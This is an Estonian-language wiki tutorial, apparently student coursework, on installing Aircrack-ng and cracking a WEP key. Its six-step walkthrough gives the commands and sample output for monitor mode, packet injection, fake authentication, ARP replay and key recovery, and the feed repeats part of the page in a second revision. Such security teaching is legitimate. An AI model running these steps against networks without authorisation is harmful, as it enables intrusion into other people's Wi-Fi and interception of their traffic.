Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode&lt;br /&gt;
&lt;br /&gt;
]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89322</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89322"/>
		<updated>2015-05-25T19:45:44Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Näide WEP võtme lahti murdmise protsessist */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
